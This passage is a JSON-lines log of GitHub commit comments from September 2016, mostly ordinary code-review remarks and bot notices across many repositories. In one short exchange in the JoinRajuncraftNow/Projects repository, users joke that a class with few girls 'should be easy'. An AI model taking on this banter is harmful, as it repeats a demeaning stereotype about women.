{"id":"4548644322","type":"CommitCommentEvent","actor":{"login":"schokoTT"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18983017,"position":null,"line":null,"path":null,"commit_id":"2f8de37d53b939898d73551cf9215e276a192d57","created_at":"2016-09-12T11:05:04Z","updated_at":"2016-09-12T11:05:04Z","body":"嘛 下次注意=。="}},"created_at":"2016-09-12T11:05:04Z"}
{"id":"4548645850","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"Laborst/Labs-C-"},"payload":{"comment":{"id":18983023,"position":32,"line":32,"path":"1st_work/Task_3/Task_3/Task_3/Program.cs","commit_id":"1448cbd1b7e56464b84f147bb3dd334c6560df9e","created_at":"2016-09-12T11:05:26Z","updated_at":"2016-09-12T11:05:26Z","body":"Такие телодвижения со строками (+=) опасны, лучше использовать StringBuilder. На тимусе слишком мягкие ограничения на память и здесь не так много операций, но вообще не приятно, почитай про иммутабельность строк, на следующей паре еще этого коснусь."}},"created_at":"2016-09-12T11:05:26Z"}
{"id":"4548647491","type":"CommitCommentEvent","actor":{"login":"mrwiggles"},"repo":{"name":"ActionIQ/scalastyle-rules"},"payload":{"comment":{"id":18983029,"position":13,"line":6,"path":"src/main/resources/reference.conf","commit_id":"03110d25845f3a8bc03923a8511e29d43363f02d","created_at":"2016-09-12T11:05:48Z","updated_at":"2016-09-12T11:05:48Z","body":"I don't think this is a good idea. At least for the slick db, we initialize the db as a `val` and I really don't want to have to make a synchronized call to it every time I need to access the db."}},"created_at":"2016-09-12T11:05:48Z"}
{"id":"4548650180","type":"CommitCommentEvent","actor":{"login":"alexsedova"},"repo":{"name":"Praqma/tracey-broker"},"payload":{"comment":{"id":18983034,"position":91,"line":91,"path":"src/main/java/net/praqma/tracey/broker/rabbitmq/RabbitMQConnection.java","commit_id":"70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72","created_at":"2016-09-12T11:06:29Z","updated_at":"2016-09-12T11:06:29Z","body":"https://docs.oracle.com/javase/8/docs/api/java/util/Map.html#getOrDefault-java.lang.Object-V-\r\n"}},"created_at":"2016-09-12T11:06:29Z"}
{"id":"4548650334","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18983035,"position":7,"line":39,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T11:06:32Z","updated_at":"2016-09-12T11:06:32Z","body":"moved. I also renamed it to ossimWin32FindFileHandle"}},"created_at":"2016-09-12T11:06:32Z"}
{"id":"4548653752","type":"CommitCommentEvent","actor":{"login":"Hotreneke"},"repo":{"name":"OpenZWave/open-zwave"},"payload":{"comment":{"id":18983046,"position":null,"line":null,"path":null,"commit_id":"5df1d5292531197120c7602326e25c11d6993432","created_at":"2016-09-12T11:07:27Z","updated_at":"2016-09-12T11:07:27Z","body":"Any updates?\r\nCan anybody confirm, that this is a work in progress?"}},"created_at":"2016-09-12T11:07:27Z"}
{"id":"4548655286","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18983050,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:07:52Z","updated_at":"2016-09-12T11:07:52Z","body":"Nonetheless, there's got to be less girls in a DE class than CSE.\r\nSo it should be easy!\r\n"}},"created_at":"2016-09-12T11:07:52Z"}
{"id":"4548655326","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18983051,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-12T11:07:53Z","updated_at":"2016-09-12T11:07:53Z","body":"Ne, theoretisch kann \"master\" auf oe-a weg, denn den nutzt keiner mehr.\r\nGebaut wird aus \"branding\", dort wo alle Box- und Fernbedienungs-Images gelöscht sind, weil sie im Branding-Modul drin sind, die branch muß also bleiben.\r\n"}},"created_at":"2016-09-12T11:07:53Z"}
{"id":"4548659756","type":"CommitCommentEvent","actor":{"login":"mtekel"},"repo":{"name":"alphagov/paas-cf"},"payload":{"comment":{"id":18983060,"position":6,"line":10,"path":"manifests/bosh-manifest/deployments/050-datadog.yml","commit_id":"beb80bc7bb1e79c5c5edf53c660722172c13698a","created_at":"2016-09-12T11:09:03Z","updated_at":"2016-09-12T11:09:03Z","body":"but it was not so from beginning. If we would want to do that we'd have to re-factor about half of the commits, which is a lot of work for nothing"}},"created_at":"2016-09-12T11:09:03Z"}
{"id":"4548664919","type":"CommitCommentEvent","actor":{"login":"sbordet"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18983069,"position":12,"line":85,"path":"jetty-servlet/src/test/java/org/eclipse/jetty/servlet/StatisticsServletTest.java","commit_id":"1cb705ff3402ccb02f52cbf85b325a4f1c609926","created_at":"2016-09-12T11:10:23Z","updated_at":"2016-09-12T11:10:23Z","body":"It's the opposite here.\r\n\r\n```java\r\nstatsHandler.setHandler(statsContext);\r\n```"}},"created_at":"2016-09-12T11:10:23Z"}
{"id":"4548666114","type":"CommitCommentEvent","actor":{"login":"kamalhakim"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18983075,"position":null,"line":null,"path":null,"commit_id":"9cb6e87fa7e0a86268b3d3c085203ded4fb2d6aa","created_at":"2016-09-12T11:10:42Z","updated_at":"2016-09-12T11:10:42Z","body":"I realised just two tasks, essentials and chefdk, fail.. if you do them manually others will go.. it must be related to the script changes in those two and it doesn't have anything to do with bouncycastle.. I am nailing them down "}},"created_at":"2016-09-12T11:10:42Z"}
{"id":"4548667463","type":"CommitCommentEvent","actor":{"login":"sikavinraj"},"repo":{"name":"digitallyinspiredmedia/buttalks"},"payload":{"comment":{"id":18983081,"position":null,"line":null,"path":null,"commit_id":"a39d428e581f622ebee7c9b97ef4faf1e78af531","created_at":"2016-09-12T11:11:04Z","updated_at":"2016-09-12T11:11:04Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;v3f0VRgx&#x2F;32-ui-https-digitallyinspiredmedia-github-io-buttalks\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> UI: https:&#x2F;&#x2F;digitallyinspiredmedia.github.io&#x2F;buttalks&#x2F;</a>"}},"created_at":"2016-09-12T11:11:04Z"}
{"id":"4548668911","type":"CommitCommentEvent","actor":{"login":"s6fikass"},"repo":{"name":"fiduswriter/fiduswriter"},"payload":{"comment":{"id":18983084,"position":null,"line":null,"path":null,"commit_id":"90c8b29b04e8001db29a42e294d010b964e430a6","created_at":"2016-09-12T11:11:25Z","updated_at":"2016-09-12T11:11:25Z","body":" this.citFm = new FormatCitations(this.citInfos, this.doc.settings.citationstyle, this.bibDB)\r\nas the FormatCitations parameters needs a callback function this call produce an error"}},"created_at":"2016-09-12T11:11:25Z"}
{"id":"4548669024","type":"CommitCommentEvent","actor":{"login":"marjev"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18983085,"position":null,"line":null,"path":null,"commit_id":"939a3672d4c2f65a6c8d04ebe7cacb621d8a1485","created_at":"2016-09-12T11:11:27Z","updated_at":"2016-09-12T11:11:27Z","body":"@marcotuts, could you please take a look at the post linked in the comment above? Please let me know if the badge should be removed or not? I can fix this and propose a PR, but I would like your feedback on this before I make any changes. Thanks!"}},"created_at":"2016-09-12T11:11:27Z"}
{"id":"4548669326","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983086,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:11:32Z","updated_at":"2016-09-12T11:11:32Z","body":"> As far as I know, WGS84 isn't a projection but rather a geodetic datum. \r\n\r\nI'm not sure. Could it be that WGS84 *can* be projected using e.g. Mercator to get a rectangular, flat map? If so, I'd still prefer the \"rawer\" WGS84 coordinates."}},"created_at":"2016-09-12T11:11:32Z"}
{"id":"4548669380","type":"CommitCommentEvent","actor":{"login":"sethvargo"},"repo":{"name":"hashicorp/vault-rails"},"payload":{"comment":{"id":18983087,"position":6,"line":65,"path":"lib/vault/rails.rb","commit_id":"07399786d9fc09c295e93af0df87023eaf26c827","created_at":"2016-09-12T11:11:33Z","updated_at":"2016-09-12T11:11:33Z","body":"There is no difference (in go) between `== \"\"` and `len(x) == 0`, so nothing will change."}},"created_at":"2016-09-12T11:11:33Z"}
{"id":"4548670057","type":"CommitCommentEvent","actor":{"login":"izak"},"repo":{"name":"tuomassalo/ib.victron"},"payload":{"comment":{"id":18983089,"position":null,"line":null,"path":null,"commit_id":"5e8cef814d5f82b9d9090123cf0e9276b6053cdc","created_at":"2016-09-12T11:11:44Z","updated_at":"2016-09-12T11:11:44Z","body":"Perhaps add an option for the graphite server instead of hardcoding it, like I did here:\r\n\r\nhttps://github.com/izak/ib.victron/blob/master/ib/victron/scripts/setlimit.py#L7\r\n\r\n:-)\r\n\r\nGood work. Glad to see someone is using it."}},"created_at":"2016-09-12T11:11:44Z"}
{"id":"4548676223","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":18983103,"position":5,"line":4,"path":"dokan/access.c","commit_id":"5f2079ad87c11992b2b5dc2d9f9b8f7af77f615f","created_at":"2016-09-12T11:13:23Z","updated_at":"2016-09-12T11:13:23Z","body":"I do not have a clue, but is this (`2016 - 2016`) intended?"}},"created_at":"2016-09-12T11:13:23Z"}
{"id":"4548676452","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983104,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:13:26Z","updated_at":"2016-09-12T11:13:26Z","body":"I don't think so. Your library has a caveat (it can only draw `Polygon` & `MultiPolygon`), which would be fixed by using `geojson-flatten`."}},"created_at":"2016-09-12T11:13:26Z"}
{"id":"4548677828","type":"CommitCommentEvent","actor":{"login":"th3w4y"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18983106,"position":202,"line":150,"path":"pokemongo_bot/walkers/step_walker.py","commit_id":"755ef56d6c123a3ee5fcc76ed5120b30c7aa6746","created_at":"2016-09-12T11:13:48Z","updated_at":"2016-09-12T11:13:48Z","body":"We don't use angle offset formula?"}},"created_at":"2016-09-12T11:13:48Z"}
{"id":"4548681195","type":"CommitCommentEvent","actor":{"login":"johanneswilm"},"repo":{"name":"fiduswriter/fiduswriter"},"payload":{"comment":{"id":18983110,"position":null,"line":null,"path":null,"commit_id":"90c8b29b04e8001db29a42e294d010b964e430a6","created_at":"2016-09-12T11:14:42Z","updated_at":"2016-09-12T11:14:42Z","body":"@s6fikass Ok, I am looking at this now."}},"created_at":"2016-09-12T11:14:42Z"}
{"id":"4548682054","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983111,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:14:55Z","updated_at":"2016-09-12T11:14:55Z","body":"[The relevant part of `geojson-flatten` is only `1.4k`.](https://github.com/mapbox/geojson-flatten/blob/958a8ef/index.js)"}},"created_at":"2016-09-12T11:14:55Z"}
{"id":"4548682619","type":"CommitCommentEvent","actor":{"login":"kamalhakim"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18983112,"position":null,"line":null,"path":null,"commit_id":"9cb6e87fa7e0a86268b3d3c085203ded4fb2d6aa","created_at":"2016-09-12T11:15:03Z","updated_at":"2016-09-12T11:15:03Z","body":"I opened a new issue for this\r\nhttps://github.com/karamelchef/karamel/issues/174"}},"created_at":"2016-09-12T11:15:03Z"}
{"id":"4548683040","type":"CommitCommentEvent","actor":{"login":"mryap"},"repo":{"name":"mryap/mywebsite"},"payload":{"comment":{"id":18983115,"position":null,"line":null,"path":null,"commit_id":"000eca0e0e418c0364aa31e0015dacfaaee92262","created_at":"2016-09-12T11:15:12Z","updated_at":"2016-09-12T11:15:12Z","body":"Trying to add icon to the date. "}},"created_at":"2016-09-12T11:15:12Z"}
{"id":"4548685048","type":"CommitCommentEvent","actor":{"login":"Tarrasch"},"repo":{"name":"spotify/luigi"},"payload":{"comment":{"id":18983120,"position":105,"line":831,"path":"test/worker_test.py","commit_id":"c76284218b64e3784654eacd18d6deceb07825b7","created_at":"2016-09-12T11:15:39Z","updated_at":"2016-09-12T11:15:39Z","body":"I noticed that this test was passing for the wrong reasons. I pretty much deleted it."}},"created_at":"2016-09-12T11:15:39Z"}
{"id":"4548686082","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18983124,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T11:15:54Z","updated_at":"2016-09-12T11:15:54Z","body":"udev rules should be plug & play..."}},"created_at":"2016-09-12T11:15:54Z"}
{"id":"4548688703","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"atoomic/IO-Socket-IP"},"payload":{"comment":{"id":18983130,"position":52,"line":468,"path":"lib/IO/Socket/IP.pm","commit_id":"8b9f9d970416610205409f61f3ec64e8a2d82f57","created_at":"2016-09-12T11:16:36Z","updated_at":"2016-09-12T11:16:36Z","body":"no parens?"}},"created_at":"2016-09-12T11:16:36Z"}
{"id":"4548689607","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18983132,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T11:16:51Z","updated_at":"2016-09-12T11:16:51Z","body":"can we replace ossimnotify messages with scoped_log?."}},"created_at":"2016-09-12T11:16:51Z"}
{"id":"4548689917","type":"CommitCommentEvent","actor":{"login":"towfiqi"},"repo":{"name":"minthemiddle/powered-by-wordpress"},"payload":{"comment":{"id":18983135,"position":null,"line":null,"path":null,"commit_id":"c7c128f6125300334066d98fce4609321b75eec9","created_at":"2016-09-12T11:16:56Z","updated_at":"2016-09-12T11:16:56Z","body":"@minthemiddle Many Thanks :)"}},"created_at":"2016-09-12T11:16:56Z"}
{"id":"4548690488","type":"CommitCommentEvent","actor":{"login":"chinh1"},"repo":{"name":"chinh1/test"},"payload":{"comment":{"id":18983137,"position":4,"line":8,"path":"src/ttttttttt.java","commit_id":"bc3bc6feb24d2b19f8e806d6b85db485e7bde393","created_at":"2016-09-12T11:17:05Z","updated_at":"2016-09-12T11:17:05Z","body":"eeeeeeeeeee"}},"created_at":"2016-09-12T11:17:05Z"}
{"id":"4548690939","type":"CommitCommentEvent","actor":{"login":"chinh1"},"repo":{"name":"chinh1/test"},"payload":{"comment":{"id":18983138,"position":3,"line":7,"path":"src/ttttttttt.java","commit_id":"bc3bc6feb24d2b19f8e806d6b85db485e7bde393","created_at":"2016-09-12T11:17:12Z","updated_at":"2016-09-12T11:17:12Z","body":"fdfdfdfdf"}},"created_at":"2016-09-12T11:17:12Z"}
{"id":"4548690951","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"atoomic/IO-Socket-IP"},"payload":{"comment":{"id":18983139,"position":113,"line":625,"path":"lib/IO/Socket/IP.pm","commit_id":"8b9f9d970416610205409f61f3ec64e8a2d82f57","created_at":"2016-09-12T11:17:12Z","updated_at":"2016-09-12T11:17:12Z","body":"again mixing and with or without parens"}},"created_at":"2016-09-12T11:17:12Z"}
{"id":"4548690959","type":"CommitCommentEvent","actor":{"login":"indy91"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18983140,"position":null,"line":null,"path":null,"commit_id":"a5fa74588c4cbe35534437eb65d5f1e246973ffc","created_at":"2016-09-12T11:17:12Z","updated_at":"2016-09-12T11:17:12Z","body":"I never commited this to our agc_engine.c in NASSP. It fixes the LPD issue. Well, at least it seems to do the \"time-remaining for landing point redesignation\" countdown now, but still no actual redesignation."}},"created_at":"2016-09-12T11:17:12Z"}
{"id":"4548692612","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18983143,"position":1,"line":1,"path":"main/src/addins/MonoDevelop.UnitTesting.NUnit/NUnit3Runner/NUnit3Runner64.csproj","commit_id":"2006a09de07c5710652aa9d90f80e77f7f6118f8","created_at":"2016-09-12T11:17:36Z","updated_at":"2016-09-12T11:17:36Z","body":"Need do we need an actual 64-bit version of the test runner? Can we use a single build and either use `mono32` or `mono64` to launch it?\r\n\r\nIf separate 32 and 64 bit builds of the test runner are needed and then will I need to do the same for guiunit? Will we also need the scene for xunit?"}},"created_at":"2016-09-12T11:17:36Z"}
{"id":"4548693141","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"UnknownShadow200/ClassicalSharp"},"payload":{"comment":{"id":18983146,"position":null,"line":null,"path":null,"commit_id":"da8ebc61b12a4a9e5196afb0c6881296b2f85ded","created_at":"2016-09-12T11:17:45Z","updated_at":"2016-09-12T11:17:45Z","body":":smile:"}},"created_at":"2016-09-12T11:17:45Z"}
{"id":"4548695918","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18983150,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T11:18:30Z","updated_at":"2016-09-12T11:18:30Z","body":"And esptool could require esp-udev-rules.\n"}},"created_at":"2016-09-12T11:18:30Z"}
{"id":"4548696666","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":18983154,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2016-09-12T11:18:42Z","updated_at":"2016-09-12T11:18:42Z","body":"@tgil02 \r\nTry eager loading the membership table in your customers controller to see if that clears up the issue:\r\n```\r\n       public ActionResult Details(int id)\r\n        {\r\n            var customer = _context.Customers\r\n                                 .Include(c => c.MembershipType)\r\n                                 .SingleOrDefault(c => c.Id == id);\r\n\r\n            if (customer == null)\r\n                return HttpNotFound();\r\n\r\n            return View(customer);\r\n        }\r\n```     \r\n \r\n"}},"created_at":"2016-09-12T11:18:42Z"}
{"id":"4548698562","type":"CommitCommentEvent","actor":{"login":"White-Oak"},"repo":{"name":"siphilia/qml-rust"},"payload":{"comment":{"id":18983158,"position":null,"line":null,"path":null,"commit_id":"217207732269f9ec81469cc9b45442739efee7dd","created_at":"2016-09-12T11:19:13Z","updated_at":"2016-09-12T11:19:13Z","body":"I've made a pull request: https://github.com/White-Oak/qml-rust/pull/7, if you agree, I will merge it. "}},"created_at":"2016-09-12T11:19:13Z"}
{"id":"4548701281","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":18983165,"position":32,"line":161,"path":"examples/select/select.hpp","commit_id":"0819c915f3c9a79b99655ce47802c8f3c949ec41","created_at":"2016-09-12T11:19:56Z","updated_at":"2016-09-12T11:19:56Z","body":"why the `.Keep()` here (and the two below it)? `data` is not used afterwards any more."}},"created_at":"2016-09-12T11:19:56Z"}
{"id":"4548702017","type":"CommitCommentEvent","actor":{"login":"javasmaster"},"repo":{"name":"javasmaster/nikitas_project"},"payload":{"comment":{"id":18983166,"position":null,"line":null,"path":null,"commit_id":"26a21fdffa586621ac81c48e7ca9349dcc6d4cb3","created_at":"2016-09-12T11:20:08Z","updated_at":"2016-09-12T11:20:08Z","body":"Метод jQuery fadeIn();\r\n5) Подключить файл шрифта Legue Gothic c помощью @font"}},"created_at":"2016-09-12T11:20:08Z"}
{"id":"4548703839","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983171,"position":29,"line":29,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:20:35Z","updated_at":"2016-09-12T11:20:35Z","body":"It is the [ISC license](https://en.wikipedia.org/wiki/ISC_license) because it is missing the \"The MIT license (MIT)\" line and the 2nd paragraph."}},"created_at":"2016-09-12T11:20:35Z"}
{"id":"4548705032","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":18983183,"position":14,"line":94,"path":"examples/select/select.hpp","commit_id":"0819c915f3c9a79b99655ce47802c8f3c949ec41","created_at":"2016-09-12T11:20:52Z","updated_at":"2016-09-12T11:20:52Z","body":"That this is needed seems like a bug in the execution semantics to me, honestly."}},"created_at":"2016-09-12T11:20:52Z"}
{"id":"4548705942","type":"CommitCommentEvent","actor":{"login":"SeoFood"},"repo":{"name":"JosephSilber/bouncer"},"payload":{"comment":{"id":18983185,"position":null,"line":null,"path":null,"commit_id":"492982c40c6e7df88dc084872c3a99ee3acfcfe4","created_at":"2016-09-12T11:21:06Z","updated_at":"2016-09-12T11:21:06Z","body":"any reasons why you remove the copes? I have massive used them :("}},"created_at":"2016-09-12T11:21:06Z"}
{"id":"4548706738","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"atoomic/IO-Socket-IP"},"payload":{"comment":{"id":18983188,"position":null,"line":null,"path":null,"commit_id":"8b9f9d970416610205409f61f3ec64e8a2d82f57","created_at":"2016-09-12T11:21:18Z","updated_at":"2016-09-12T11:21:18Z","body":"In cperl's 0.37 Carp is demand-loaded"}},"created_at":"2016-09-12T11:21:18Z"}
{"id":"4548707341","type":"CommitCommentEvent","actor":{"login":"addshore"},"repo":{"name":"addwiki/wikibase-api"},"payload":{"comment":{"id":18983191,"position":null,"line":null,"path":null,"commit_id":"dc5eeb7196bca28b6c886df820f9cfa9c3b96caa","created_at":"2016-09-12T11:21:28Z","updated_at":"2016-09-12T11:21:28Z","body":"@Abbe98 how do you think the docs for all of the addwiki libraries would best be presented?\r\nI have created https://phabricator.wikimedia.org/T145376 to track this.\r\n"}},"created_at":"2016-09-12T11:21:28Z"}
{"id":"4548712592","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18983201,"position":null,"line":null,"path":null,"commit_id":"5850819530fba61748131ca21d3ebfea60513db2","created_at":"2016-09-12T11:22:55Z","updated_at":"2016-09-12T11:22:55Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-12T11:22:55Z"}
{"id":"4548713880","type":"CommitCommentEvent","actor":{"login":"oldj"},"repo":{"name":"oldj/SwitchHosts"},"payload":{"comment":{"id":18983204,"position":null,"line":null,"path":null,"commit_id":"773f382adac97850e22c657b6c55361735cd7751","created_at":"2016-09-12T11:23:14Z","updated_at":"2016-09-12T11:23:14Z","body":"#109 "}},"created_at":"2016-09-12T11:23:14Z"}
{"id":"4548715398","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18983212,"position":197,"line":197,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T11:23:37Z","updated_at":"2016-09-12T11:23:37Z","body":"The `--enable` process looked like this:\r\n```\r\n[root@localhost test]# proxysql-admin-tool/proxysql-admin-tool.sh --enable -uroot --port=26100\r\nStarting ProxySQL..\r\n\r\nConfiguring ProxySQL monitoring user..\r\nEnter ProxySQL monitoring username: admin\r\nEnter ProxySQL monitoring password: admin\r\nAdding the Percona XtraDB Cluster server nodes to ProxySQL\r\n\r\nConfiguring Percona XtraDB Cluster user to connect through ProxySQL\r\nEnter Percona XtraDB Cluster user name: proxysql\r\nEnter Percona XtraDB Cluster user password: proxysql\r\n/tmp/pxc-proxysql-monitor.pid pid file exists\r\n```\r\n\r\nTwo things:\r\n1. the password is displayed when entered - should we make it \"silent\" and not display?\r\n2. From output `/tmp/pxc-proxysql-monitor.pid pid file exists` it's not clear if the process finished ok or not?"}},"created_at":"2016-09-12T11:23:37Z"}
{"id":"4548716231","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18983215,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-12T11:23:50Z","updated_at":"2016-09-12T11:23:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 982](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13110&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-12T11:23:50Z"}
{"id":"4548717275","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18983218,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:24:07Z","updated_at":"2016-09-12T11:24:07Z","body":"Not in DE either. After school. Btw there are no girls in DE. "}},"created_at":"2016-09-12T11:24:07Z"}
{"id":"4548718488","type":"CommitCommentEvent","actor":{"login":"Kingziqiang"},"repo":{"name":"Kingziqiang/Do-own-hereo-"},"payload":{"comment":{"id":18983221,"position":null,"line":null,"path":null,"commit_id":"0d36d1267b0c6ca4036d3408ddb476cb408eba5f","created_at":"2016-09-12T11:24:25Z","updated_at":"2016-09-12T11:24:25Z","body":"![img_20160209_150142](https://cloud.githubusercontent.com/assets/19208718/18434221/719dc6a0-791e-11e6-8b05-9933744958af.jpg)\r\n"}},"created_at":"2016-09-12T11:24:25Z"}
{"id":"4548718773","type":"CommitCommentEvent","actor":{"login":"thejameskyle"},"repo":{"name":"flowtype/flow-typed"},"payload":{"comment":{"id":18983223,"position":8,"line":22,"path":"definitions/npm/bull_v1.x.x/flow_>=v0.22.x/bull_v1.x.x.js","commit_id":"f622abbe3eae89792276854dfb75ff41ff61b94b","created_at":"2016-09-12T11:24:29Z","updated_at":"2016-09-12T11:24:29Z","body":"ping @marudor "}},"created_at":"2016-09-12T11:24:29Z"}
{"id":"4548722156","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18983229,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:25:20Z","updated_at":"2016-09-12T11:25:20Z","body":"Heh, KNEW IT!\r\nAs long as it's not ONE person, I won't care..."}},"created_at":"2016-09-12T11:25:20Z"}
{"id":"4548722490","type":"CommitCommentEvent","actor":{"login":"pravinhirmukhe"},"repo":{"name":"pravinhirmukhe/roughsheet"},"payload":{"comment":{"id":18983231,"position":null,"line":null,"path":null,"commit_id":"c512fd56a53bb93c86cd3dc682ed80192ab2cc9e","created_at":"2016-09-12T11:25:26Z","updated_at":"2016-09-12T11:25:26Z","body":"Test commit"}},"created_at":"2016-09-12T11:25:26Z"}
{"id":"4548722557","type":"CommitCommentEvent","actor":{"login":"olamy"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":18983232,"position":12,"line":85,"path":"jetty-servlet/src/test/java/org/eclipse/jetty/servlet/StatisticsServletTest.java","commit_id":"1cb705ff3402ccb02f52cbf85b325a4f1c609926","created_at":"2016-09-12T11:25:27Z","updated_at":"2016-09-12T11:25:27Z","body":"if doing that in Statistics#init the following code Handler handler = _server.getChildHandlerByClass(StatisticsHandler.class);  returns null now."}},"created_at":"2016-09-12T11:25:27Z"}
{"id":"4548725476","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18983239,"position":null,"line":null,"path":null,"commit_id":"02880e021e03d856151d10ec24fcbbcb2e3e2c9b","created_at":"2016-09-12T11:26:11Z","updated_at":"2016-09-12T11:26:11Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on 